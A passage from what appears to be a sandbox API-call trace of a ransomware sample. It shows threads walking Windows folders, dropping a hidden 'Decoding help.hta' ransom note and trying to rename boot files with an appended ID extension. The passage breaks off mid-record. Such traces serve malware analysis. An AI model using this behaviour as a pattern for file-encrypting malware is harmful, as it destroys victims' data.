[0039.335] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.336] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Microsoft Help" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help" [0039.336] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0039.336] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97c24a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.348] CloseHandle (hObject=0x198) returned 1 [0039.348] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0039.348] lstrcmpW (lpString1=".", lpString2="Mozilla") returned -1 [0039.348] lstrcmpW (lpString1="..", lpString2="Mozilla") returned -1 [0039.348] lstrcmpiW (lpString1="windows", lpString2="Mozilla") returned 1 [0039.349] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.349] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.349] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Mozilla" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla") returned="\\\\?\\C:\\Users\\All Users\\Mozilla" [0039.350] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Mozilla\\*.*" [0039.350] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x983a6a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.362] CloseHandle (hObject=0x198) returned 1 [0039.362] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0039.362] lstrcmpW (lpString1=".", lpString2="Oracle") returned -1 [0039.362] lstrcmpW (lpString1="..", lpString2="Oracle") returned -1 [0039.362] lstrcmpiW (lpString1="windows", lpString2="Oracle") returned 1 [0039.363] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.363] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.363] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Oracle" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Oracle") returned="\\\\?\\C:\\Users\\All Users\\Oracle" [0039.364] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Oracle", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Oracle\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Oracle\\*.*" [0039.364] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x989a848, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.377] CloseHandle (hObject=0x198) returned 1 [0039.377] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0039.377] lstrcmpW (lpString1=".", lpString2="Package Cache") returned -1 [0039.377] lstrcmpW (lpString1="..", lpString2="Package Cache") returned -1 [0039.377] lstrcmpiW (lpString1="windows", lpString2="Package Cache") returned 1 [0039.379] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.379] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.379] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Package Cache" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache") returned="\\\\?\\C:\\Users\\All Users\\Package Cache" [0039.379] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0039.379] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.379] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98ca918, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.390] CloseHandle (hObject=0x198) returned 1 [0039.390] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0039.390] lstrcmpW (lpString1=".", lpString2="Start Menu") returned -1 [0039.390] lstrcmpW (lpString1="..", lpString2="Start Menu") returned -1 [0039.390] lstrcmpiW (lpString1="windows", lpString2="Start Menu") returned 1 [0039.391] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.391] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.391] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Start Menu" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu") returned="\\\\?\\C:\\Users\\All Users\\Start Menu" [0039.392] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Start Menu\\*.*" [0039.392] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x992aab8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.404] CloseHandle (hObject=0x198) returned 1 [0039.404] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0039.404] lstrcmpW (lpString1=".", lpString2="Sun") returned -1 [0039.404] lstrcmpW (lpString1="..", lpString2="Sun") returned -1 [0039.404] lstrcmpiW (lpString1="windows", lpString2="Sun") returned 1 [0039.406] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.406] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.406] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Sun" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun") returned="\\\\?\\C:\\Users\\All Users\\Sun" [0039.406] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Sun", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Sun\\*.*" [0039.406] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x998ac58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.420] CloseHandle (hObject=0x198) returned 1 [0039.420] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0039.420] lstrcmpW (lpString1=".", lpString2="Templates") returned -1 [0039.420] lstrcmpW (lpString1="..", lpString2="Templates") returned -1 [0039.420] lstrcmpiW (lpString1="windows", lpString2="Templates") returned 1 [0039.422] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0039.422] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\*.*") returned 26 [0039.422] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\", lpString2="Templates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Templates") returned="\\\\?\\C:\\Users\\All Users\\Templates" [0039.422] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Templates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Templates\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Templates\\*.*" [0039.422] GlobalMemoryStatus (in: lpBuffer=0x5a8fd10 | out: lpBuffer=0x5a8fd10) [0039.422] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a02e60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.444] CloseHandle (hObject=0x198) returned 1 [0039.444] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x5a8fd30 | out: lpFindFileData=0x5a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0039.444] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 52 os_tid = 0xb04 [0039.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*.*", lpFindFileData=0x5bcfd30 | out: lpFindFileData=0x5bcfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 53 os_tid = 0xb08 [0039.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\*.*", lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1ae930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0039.290] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.290] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1ae930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.291] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.291] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1ae930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0039.291] lstrcmpW (lpString1=".", lpString2="AS OLEDB") returned -1 [0039.291] lstrcmpW (lpString1="..", lpString2="AS OLEDB") returned -1 [0039.291] lstrcmpiW (lpString1="windows", lpString2="AS OLEDB") returned 1 [0039.292] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\*.*" [0039.292] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\*.*") returned 58 [0039.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\", lpString2="AS OLEDB" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB" [0039.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\*.*" [0039.292] GlobalMemoryStatus (in: lpBuffer=0x610fd10 | out: lpBuffer=0x610fd10) [0039.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96d2090, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.302] CloseHandle (hObject=0x1ac) returned 1 [0039.303] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1ae930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0039.303] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 54 os_tid = 0xb0c [0039.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\*.*", lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5370 [0039.300] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.300] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.300] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.300] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.300] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 1 [0039.300] lstrcmpW (lpString1=".", lpString2="v1.0") returned -1 [0039.300] lstrcmpW (lpString1="..", lpString2="v1.0") returned -1 [0039.300] lstrcmpiW (lpString1="windows", lpString2="v1.0") returned 1 [0039.301] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\*.*" [0039.301] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\*.*") returned 49 [0039.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\", lpString2="v1.0" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0" [0039.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*" [0039.302] GlobalMemoryStatus (in: lpBuffer=0x624fd10 | out: lpBuffer=0x624fd10) [0039.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x971a1c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.312] CloseHandle (hObject=0x1a8) returned 1 [0039.312] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 0 [0039.312] FindClose (in: hFindFile=0x5a5370 | out: hFindFile=0x5a5370) returned 1 Thread: id = 55 os_tid = 0xb10 [0039.308] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*.*", lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0039.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.321] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.321] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.321] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.321] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\fr-FR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\*.*") returned="\\\\?\\C:\\Boot\\fr-FR\\*.*" [0039.321] lstrlenW (lpString="\\\\?\\C:\\Boot\\fr-FR\\*.*") returned 21 [0039.321] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fr-FR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\fr-FR\\Decoding help.hta" [0039.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\Decoding help.hta" (normalized: "c:\\boot\\fr-fr\\decoding help.hta")) returned 0xffffffff [0039.321] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\Decoding help.hta" (normalized: "c:\\boot\\fr-fr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0039.321] WriteFile (in: hFile=0x1ac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x638fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x638fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.322] CloseHandle (hObject=0x1ac) returned 1 [0039.322] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.322] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.322] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\fr-FR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\*.*") returned="\\\\?\\C:\\Boot\\fr-FR\\*.*" [0039.323] lstrlenW (lpString="\\\\?\\C:\\Boot\\fr-FR\\*.*") returned 21 [0039.323] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fr-FR\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" [0039.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" [0039.323] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.323] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, 